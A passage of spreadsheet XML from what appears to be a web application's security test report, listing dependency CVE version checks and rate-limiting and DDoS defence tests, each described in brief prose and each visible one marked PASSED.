        <is>
          <t>helmet dependency check</t>
        </is>
      </c>
      <c r="F274" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G274" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H274" s="16" t="inlineStr">
        <is>
          <t>helmet 7.1.0+ loaded; Sets 14 security headers by default</t>
        </is>
      </c>
    </row>
    <row r="275" ht="22" customHeight="1">
      <c r="A275" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-019</t>
        </is>
      </c>
      <c r="B275" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C275" s="16" t="inlineStr">
        <is>
          <t>Zod Schema Parsing ReDoS Vulnerability Check</t>
        </is>
      </c>
      <c r="D275" s="16" t="inlineStr">
        <is>
          <t>Inspect Zod validation library version</t>
        </is>
      </c>
      <c r="E275" s="16" t="inlineStr">
        <is>
          <t>zod version check</t>
        </is>
      </c>
      <c r="F275" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G275" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H275" s="16" t="inlineStr">
        <is>
          <t>Zod updated to 3.22.4+; Regular expression parser safe</t>
        </is>
      </c>
    </row>
    <row r="276" ht="22" customHeight="1">
      <c r="A276" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-020</t>
        </is>
      </c>
      <c r="B276" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C276" s="16" t="inlineStr">
        <is>
          <t>Capacitor Mobile SDK Security Advisory Audit</t>
        </is>
      </c>
      <c r="D276" s="16" t="inlineStr">
        <is>
          <t>Inspect @capacitor/core version in mobile app</t>
        </is>
      </c>
      <c r="E276" s="16" t="inlineStr">
        <is>
          <t>Capacitor SDK check</t>
        </is>
      </c>
      <c r="F276" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G276" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H276" s="16" t="inlineStr">
        <is>
          <t>@capacitor/core updated to 5.6.0+; Native bridge secured</t>
        </is>
      </c>
    </row>
    <row r="277" ht="22" customHeight="1">
      <c r="A277" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-021</t>
        </is>
      </c>
      <c r="B277" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C277" s="16" t="inlineStr">
        <is>
          <t>Vite Dev Server Arbitrary File Access Check</t>
        </is>
      </c>
      <c r="D277" s="16" t="inlineStr">
        <is>
          <t>Inspect Vite dev server configuration for CVE-2023-49792</t>
        </is>
      </c>
      <c r="E277" s="16" t="inlineStr">
        <is>
          <t>Vite config check</t>
        </is>
      </c>
      <c r="F277" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G277" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H277" s="16" t="inlineStr">
        <is>
          <t>Vite server.fs.strict enabled; Arbitrary file access disabled</t>
        </is>
      </c>
    </row>
    <row r="278" ht="22" customHeight="1">
      <c r="A278" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-022</t>
        </is>
      </c>
      <c r="B278" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C278" s="16" t="inlineStr">
        <is>
          <t>Babel Code Generator Prototype Pollution Check</t>
        </is>
      </c>
      <c r="D278" s="16" t="inlineStr">
        <is>
          <t>Inspect @babel/traverse version in build chain</t>
        </is>
      </c>
      <c r="E278" s="16" t="inlineStr">
        <is>
          <t>Babel traverse check</t>
        </is>
      </c>
      <c r="F278" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G278" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H278" s="16" t="inlineStr">
        <is>
          <t>@babel/traverse updated to 7.23.2+; Prototype pollution patched</t>
        </is>
      </c>
    </row>
    <row r="279" ht="22" customHeight="1">
      <c r="A279" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-023</t>
        </is>
      </c>
      <c r="B279" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C279" s="16" t="inlineStr">
        <is>
          <t>TypeScript Compiler Security Fix Check</t>
        </is>
      </c>
      <c r="D279" s="16" t="inlineStr">
        <is>
          <t>Inspect TypeScript compiler version in project root</t>
        </is>
      </c>
      <c r="E279" s="16" t="inlineStr">
        <is>
          <t>TypeScript version check</t>
        </is>
      </c>
      <c r="F279" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G279" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H279" s="16" t="inlineStr">
        <is>
          <t>TypeScript updated to 5.3.3+; Transpilation safe</t>
        </is>
      </c>
    </row>
    <row r="280" ht="22" customHeight="1">
      <c r="A280" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-024</t>
        </is>
      </c>
      <c r="B280" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C280" s="16" t="inlineStr">
        <is>
          <t>Winston Logging Library Security Audit</t>
        </is>
      </c>
      <c r="D280" s="16" t="inlineStr">
        <is>
          <t>Inspect winston log library version</t>
        </is>
      </c>
      <c r="E280" s="16" t="inlineStr">
        <is>
          <t>winston version check</t>
        </is>
      </c>
      <c r="F280" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G280" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H280" s="16" t="inlineStr">
        <is>
          <t>Winston updated to 3.11.0+; Log injection mitigated</t>
        </is>
      </c>
    </row>
    <row r="281" ht="22" customHeight="1">
      <c r="A281" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-025</t>
        </is>
      </c>
      <c r="B281" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C281" s="16" t="inlineStr">
        <is>
          <t>OpenSSL Memory Leak Patch Verification</t>
        </is>
      </c>
      <c r="D281" s="16" t="inlineStr">
        <is>
          <t>Run memory usage leak check under sustained SSL requests</t>
        </is>
      </c>
      <c r="E281" s="16" t="inlineStr">
        <is>
          <t>Memory leak test</t>
        </is>
      </c>
      <c r="F281" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G281" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H281" s="16" t="inlineStr">
        <is>
          <t>Memory utilization remains stable; Zero SSL memory leaks observed</t>
        </is>
      </c>
    </row>
    <row r="282" ht="22" customHeight="1">
      <c r="A282" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-001</t>
        </is>
      </c>
      <c r="B282" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C282" s="16" t="inlineStr">
        <is>
          <t>Global API Endpoint Rate Limiting Verification</t>
        </is>
      </c>
      <c r="D282" s="16" t="inlineStr">
        <is>
          <t>Send 200 HTTP GET requests in 10 seconds to /api/donations</t>
        </is>
      </c>
      <c r="E282" s="16" t="inlineStr">
        <is>
          <t>High-frequency HTTP burst</t>
        </is>
      </c>
      <c r="F282" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G282" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H282" s="16" t="inlineStr">
        <is>
          <t>Rate limit enforced (max 100 req/min); Returns 429 Too Many Requests</t>
        </is>
      </c>
    </row>
    <row r="283" ht="22" customHeight="1">
      <c r="A283" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-002</t>
        </is>
      </c>
      <c r="B283" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C283" s="16" t="inlineStr">
        <is>
          <t>Login Rate Limiting per IP Address</t>
        </is>
      </c>
      <c r="D283" s="16" t="inlineStr">
        <is>
          <t>Send 30 POST /api/login requests from single IP in 1 minute</t>
        </is>
      </c>
      <c r="E283" s="16" t="inlineStr">
        <is>
          <t>Login brute burst</t>
        </is>
      </c>
      <c r="F283" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G283" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H283" s="16" t="inlineStr">
        <is>
          <t>Rate limit triggered; Returns 429 Too Many Requests; Retry-After header present</t>
        </is>
      </c>
    </row>
    <row r="284" ht="22" customHeight="1">
      <c r="A284" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-003</t>
        </is>
      </c>
      <c r="B284" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C284" s="16" t="inlineStr">
        <is>
          <t>Password Reset Endpoint Rate Limiting</t>
        </is>
      </c>
      <c r="D284" s="16" t="inlineStr">
        <is>
          <t>Send 10 POST /api/auth/forgot-password requests in 1 minute</t>
        </is>
      </c>
      <c r="E284" s="16" t="inlineStr">
        <is>
          <t>Password reset burst</t>
        </is>
      </c>
      <c r="F284" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G284" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H284" s="16" t="inlineStr">
        <is>
          <t>Strict limit enforced (max 3 req/min); Additional requests throttled</t>
        </is>
      </c>
    </row>
    <row r="285" ht="22" customHeight="1">
      <c r="A285" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-004</t>
        </is>
      </c>
      <c r="B285" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C285" s="16" t="inlineStr">
        <is>
          <t>API Key Rate Limiting per Client</t>
        </is>
      </c>
      <c r="D285" s="16" t="inlineStr">
        <is>
          <t>Send 500 requests using single API key within 1 minute</t>
        </is>
      </c>
      <c r="E285" s="16" t="inlineStr">
        <is>
          <t>API Key burst load</t>
        </is>
      </c>
      <c r="F285" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G285" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H285" s="16" t="inlineStr">
        <is>
          <t>Client quota enforced (max 300 req/min); 429 Quota Exceeded returned</t>
        </is>
      </c>
    </row>
    <row r="286" ht="22" customHeight="1">
      <c r="A286" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-005</t>
        </is>
      </c>
      <c r="B286" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C286" s="16" t="inlineStr">
        <is>
          <t>HTTP Connection Reuse (Keep-Alive) Timeout</t>
        </is>
      </c>
      <c r="D286" s="16" t="inlineStr">
        <is>
          <t>Open TCP socket and keep connection idle without sending data</t>
        </is>
      </c>
      <c r="E286" s="16" t="inlineStr">
        <is>
          <t>Idle socket connection</t>
        </is>
      </c>
      <c r="F286" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G286" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H286" s="16" t="inlineStr">
        <is>
          <t>Server closes idle socket after 15 seconds; Prevents socket exhaustion</t>
        </is>
      </c>
    </row>
    <row r="287" ht="22" customHeight="1">
      <c r="A287" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-006</t>
        </is>
      </c>
      <c r="B287" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C287" s="16" t="inlineStr">
        <is>
          <t>DDoS Mitigation - SYN Flood Protection</t>
        </is>
      </c>
      <c r="D287" s="16" t="inlineStr">
        <is>
          <t>Simulate SYN flood packet burst to server port 443</t>
        </is>
      </c>
      <c r="E287" s="16" t="inlineStr">
        <is>
          <t>SYN flood simulation</t>
        </is>
      </c>
      <c r="F287" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G287" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H287" s="16" t="inlineStr">
        <is>
          <t>SYN cookies enabled (net.ipv4.tcp_syncookies = 1); Connection queue stable</t>
        </is>
      </c>
    </row>
    <row r="288" ht="22" customHeight="1">
      <c r="A288" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-007</t>
        </is>
      </c>
      <c r="B288" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C288" s="16" t="inlineStr">
        <is>
          <t>DDoS Mitigation - HTTP Flood Rate Throttling</t>
        </is>
      </c>
      <c r="D288" s="16" t="inlineStr">
        <is>
          <t>Simulate 5,000 HTTP GET requests/sec via cloud proxy</t>
        </is>
      </c>
      <c r="E288" s="16" t="inlineStr">
        <is>
          <t>HTTP flood simulation</t>
        </is>
      </c>
      <c r="F288" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G288" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H288" s="16" t="inlineStr">
        <is>
          <t>Cloudflare / Gateway WAF rate-limiting rule drops malicious IP burst</t>
        </is>
      </c>
    </row>
    <row r="289" ht="22" customHeight="1">
      <c r="A289" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-008</t>
        </is>
      </c>
      <c r="B289" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C289" s="16" t="inlineStr">
        <is>
          <t>Slow HTTP POST (R-U-Dead-Yet) Attack Defense</t>
        </is>
      </c>
      <c r="D289" s="16" t="inlineStr">
        <is>
          <t>Send HTTP POST with Content-Length: 10000 and transmit 1 byte/sec</t>
        </is>
      </c>
      <c r="E289" s="16" t="inlineStr">
        <is>
          <t>Slow POST body stream</t>
        </is>
      </c>
      <c r="F289" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G289" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H289" s="16" t="inlineStr">
        <is>
          <t>Server body read timeout enforced (10s); Hanging request terminated</t>
        </is>
      </c>
    </row>
    <row r="290" ht="22" customHeight="1">
      <c r="A290" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-009</t>
        </is>
      </c>
      <c r="B290" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C290" s="16" t="inlineStr">
        <is>
          <t>GraphQL Query Complexity Limit Enforcement</t>
        </is>
      </c>
      <c r="D290" s="16" t="inlineStr">
        <is>
          <t>Send GraphQL query requesting 1000 nested items with aliases</t>
        </is>
      </c>
      <c r="E290" s="16" t="inlineStr">
        <is>
          <t>Complex GraphQL query</t>
        </is>
      </c>
      <c r="F290" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G290" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H290" s="16" t="inlineStr">
        <is>
          <t>Query complexity calculator rejects request exceeding 500 points</t>
        </is>
      </c>
    </row>
    <row r="291" ht="22" customHeight="1">
      <c r="A291" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-010</t>
        </is>
      </c>
      <c r="B291" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C291" s="16" t="inlineStr">
        <is>
          <t>WebSocket Message Rate Limiting</t>
        </is>
      </c>
      <c r="D291" s="16" t="inlineStr">
        <is>
          <t>Send 500 WebSocket frames per second over established socket</t>
        </is>
      </c>
      <c r="E291" s="16" t="inlineStr">
        <is>
          <t>WebSocket frame burst</t>
        </is>
      </c>
      <c r="F291" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G291" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H291" s="16" t="inlineStr">
        <is>
          <t>WebSocket rate limit drops connection if frame rate exceeds 50 frames/sec</t>
        </is>
      </c>
    </row>
    <row r="292" ht="22" customHeight="1">
      <c r="A292" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-011</t>
        </is>
      </c>
      <c r="B292" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C292" s="16" t="inlineStr">
        <is>
          <t>IP Address Whitelisting for Admin Portal</t>
        </is>
      </c>
      <c r="D292" s="16" t="inlineStr">
        <is>
          <t>Attempt access to /admin from non-whitelisted IP address</t>
        </is>
      </c>
      <c r="E292" s="16" t="inlineStr">
        <is>
          <t>Non-whitelisted IP request</t>
        </is>
      </c>
      <c r="F292" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G292" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H292" s="16" t="inlineStr">
        <is>
          <t>Access denied with 403 Forbidden; Admin portal bound to VPN / Whitelist</t>
        </is>
      </c>
    </row>
    <row r="293" ht="22" customHeight="1">
      <c r="A293" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-012</t>
        </is>
      </c>
      <c r="B293" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C293" s="16" t="inlineStr">
        <is>
          <t>HTTP Request Body Size Restriction</t>
        </is>
      </c>
      <c r="D293" s="16" t="inlineStr">
        <is>
          <t>Upload 20MB JSON payload to POST /api/donations</t>
        </is>
      </c>
      <c r="E293" s="16" t="inlineStr">
        <is>
          <t>Massive JSON payload</t>
        </is>
      </c>
      <c r="F293" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G293" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H293" s="16" t="inlineStr">
        <is>
          <t>Payload size limit enforced (1MB max); Returns 413 Payload Too Large</t>
        </is>
      </c>
    </row>
    <row r="294" ht="22" customHeight="1">
      <c r="A294" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-013</t>
        </is>
      </c>
      <c r="B294" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C294" s="16" t="inlineStr">
        <is>
          <t>File Upload File Count Limitation</t>
        </is>
      </c>
      <c r="D294" s="16" t="inlineStr">
        <is>
          <t>Upload 100 files simultaneously in single multipart form</t>
        </is>
      </c>
      <c r="E294" s="16" t="inlineStr">
        <is>
          <t>Massive file batch upload</t>
        </is>
      </c>
      <c r="F294" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G294" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H294" s="16" t="inlineStr">
        <is>
          <t>Max files per request capped at 5; Excess files rejected</t>
        </is>
      </c>
    </row>
    <row r="295" ht="22" customHeight="1">
      <c r="A295" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-014</t>
        </is>
      </c>
      <c r="B295" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C295" s="16" t="inlineStr">
        <is>
          <t>Cross-Origin Resource Sharing (CORS) Preflight Caching</t>
        </is>
      </c>
      <c r="D295" s="16" t="inlineStr">
        <is>
          <t>Inspect Access-Control-Max-Age header in OPTIONS response</t>
        </is>
      </c>
      <c r="E295" s="16" t="inlineStr">
        <is>
          <t>CORS Preflight check</t>
        </is>
      </c>
      <c r="F295" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G295" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H295" s="16" t="inlineStr">
        <is>
          <t>Access-Control-Max-Age: 86400 set; Minimizes unnecessary preflight requests</t>
        </is>
      </c>
    </row>
    <row r="296" ht="22" customHeight="1">
      <c r="A296" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-015</t>
        </is>
      </c>
      <c r="B296" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C296" s="16" t="inlineStr">
        <is>
          <t>API Gateway Authentication Caching</t>
        </is>
      </c>
      <c r="D296" s="16" t="inlineStr">
        <is>
          <t>Send 1,000 API requests with valid JWT token within 1 second</t>
        </is>
      </c>
      <c r="E296" s="16" t="inlineStr">
        <is>
          <t>JWT validation burst</t>
        </is>
      </c>
      <c r="F296" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G296" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H296" s="16" t="inlineStr">
        <is>
          <t>JWT verification cached in Redis; CPU overhead minimized under load</t>
        </is>
      </c>
    </row>
    <row r="297" ht="22" customHeight="1">
      <c r="A297" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-016</t>
        </is>
      </c>
      <c r="B297" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C297" s="16" t="inlineStr">
        <is>
          <t>API Endpoint Method Whitelisting</t>
        </is>
      </c>
      <c r="D297" s="16" t="inlineStr">
        <is>
          <t>Send PATCH request to endpoint allowing only GET and POST</t>
        </is>
      </c>
      <c r="E297" s="16" t="inlineStr">
        <is>
          <t>Unallowed HTTP method</t>
        </is>
      </c>
      <c r="F297" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G297" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H297" s="16" t="inlineStr">
        <is>
          <t>Returns 405 Method Not Allowed; Exposes only implemented methods</t>
        </is>
      </c>
    </row>
    <row r="298" ht="22" customHeight="1">
      <c r="A298" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-017</t>
        </is>
      </c>
      <c r="B298" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C298" s="16" t="inlineStr">
        <is>
          <t>API Versioning Deprecation Handling</t>
        </is>
      </c>
      <c r="D298" s="16" t="inlineStr">
        <is>
          <t>Send request to deprecated /api/v1/donations endpoint</t>
        </is>
      </c>
      <c r="E298" s="16" t="inlineStr">
        <is>
          <t>Deprecated API call</t>
        </is>
      </c>
      <c r="F298" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G298" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H298" s="16" t="inlineStr">
        <is>
          <t>Deprecation header present; Gracefully routes or returns 410 Gone</t>
        </is>
      </c>
    </row>
    <row r="299" ht="22" customHeight="1">
      <c r="A299" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-018</t>
        </is>
      </c>
      <c r="B299" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C299" s="16" t="inlineStr">
        <is>
          <t>Content-Type Header Requirement Verification</t>
        </is>
      </c>
      <c r="D299" s="16" t="inlineStr">
        <is>
          <t>Send POST request with missing or text/plain Content-Type header</t>
        </is>
      </c>
      <c r="E299" s="16" t="inlineStr">
        <is>
          <t>Invalid Content-Type header</t>
        </is>
      </c>
      <c r="F299" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G299" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H299" s="16" t="inlineStr">
        <is>
          <t>API requires Content-Type: application/json; Returns 415 Unsupported Media Type</t>
        </is>
      </c>
    </row>
    <row r="300" ht="22" customHeight="1">
      <c r="A300" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-019</t>
        </is>
      </c>
      <c r="B300" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C300" s="16" t="inlineStr">
        <is>
          <t>Accept Header Content Negotiation Check</t>
        </is>
      </c>
      <c r="D300" s="16" t="inlineStr">
        <is>
          <t>Send Accept: application/xml to JSON-only REST API</t>
        </is>
      </c>
      <c r="E300" s="16" t="inlineStr">
        <is>
          <t>Invalid Accept header</t>
        </is>
      </c>
      <c r="F300" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G300" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H300" s="16" t="inlineStr">
        <is>
          <t>Returns 406 Not Acceptable or defaults safely to application/json</t>
        </is>
      </c>
    </row>
    <row r="301" ht="22" customHeight="1">
      <c r="A301" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-020</t>
        </is>
      </c>
      <c r="B301" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C301" s="16" t="inlineStr">
        <is>
          <t>HTTP Header Count &amp; Size Restriction</t>
        </is>
      </c>
      <c r="D301" s="16" t="inlineStr">
        <is>
          <t>Send HTTP request containing 500 headers of 4KB each</t>
        </is>
      </c>
      <c r="E301" s="16" t="inlineStr">
        <is>
          <t>Massive HTTP headers</t>
        </is>
      </c>
      <c r="F301" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G301" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H301" s="16" t="inlineStr">
        <is>
          <t>Server enforces max header size (8KB max total); Returns 431 Request Header Fields Too Large</t>
        </is>
      </c>
    </row>
    <row r="302" ht="22" customHeight="1">
      <c r="A302" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-021</t>
        </is>
      </c>
      <c r="B302" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C302" s="16" t="inlineStr">
        <is>
          <t>API Response Compression (Gzip/Brotli) Check</t>
        </is>
      </c>
      <c r="D302" s="16" t="inlineStr">
        <is>
          <t>Request API response with Accept-Encoding: gzip, deflate, br</t>
        </is>
      </c>
      <c r="E302" s="16" t="inlineStr">
        <is>
          <t>Gzip compression audit</t>
        </is>
      </c>
      <c r="F302" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G302" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H302" s="16" t="inlineStr">
        <is>
          <t>Response compressed with Brotli / Gzip; Data payload bandwidth optimized</t>
        </is>
      </c>
    </row>
    <row r="303" ht="22" customHeight="1">
      <c r="A303" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-022</t>
        </is>
      </c>
      <c r="B303" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C303" s="16" t="inlineStr">
        <is>
          <t>API Idempotency Key Verification</t>
        </is>
      </c>
      <c r="D303" s="16" t="inlineStr">
        <is>
          <t>Send duplicate POST requests containing same Idempotency-Key</t>
        </is>
      </c>
      <c r="E303" s="16" t="inlineStr">
        <is>
          <t>Duplicate POST request</t>
        </is>
      </c>
      <c r="F303" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G303" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H303" s="16" t="inlineStr">
        <is>
          <t>First request processed; Subsequent requests return cached response without duplicate side-effects</t>
        </is>
      </c>
    </row>
    <row r="304" ht="22" customHeight="1">
      <c r="A304" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-023</t>
        </is>
      </c>
      <c r="B304" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C304" s="16" t="inlineStr">
        <is>
          <t>Circuit Breaker Protection on Downstream APIs</t>
        </is>
      </c>
      <c r="D304" s="16" t="inlineStr">
        <is>
          <t>Simulate 50 consecutive timeouts from OpenRouter AI API</t>
        </is>
      </c>
      <c r="E304" s="16" t="inlineStr">
        <is>
          <t>Downstream failure mock</t>
        </is>
      </c>
      <c r="F304" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G304" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H304" s="16" t="inlineStr">
        <is>
          <t>Circuit breaker trips to OPEN state; Serves instant fallback response without blocking threads</t>
        </is>
      </c>
    </row>
    <row r="305" ht="22" customHeight="1">
      <c r="A305" s="15" t="inlineStr">
        <is>
          <t>SEC-RAT-024</t>
        </is>
      </c>
      <c r="B305" s="16" t="inlineStr">
        <is>
          <t>Rate Limiting &amp; DDoS Defense</t>
        </is>
      </c>
      <c r="C305" s="16" t="inlineStr">
        <is>
          <t>Graceful Degradation Under Extreme Load</t>
        </is>
      </c>
      <c r="D305" s="16" t="inlineStr">
        <is>
          <t>Simulate 2,000 VUs load on backend database pool</t>
        </is>
      </c>
      <c r="E305" s="16" t="inlineStr">
        <is>
          <t>High load simulation</t>
        </is>
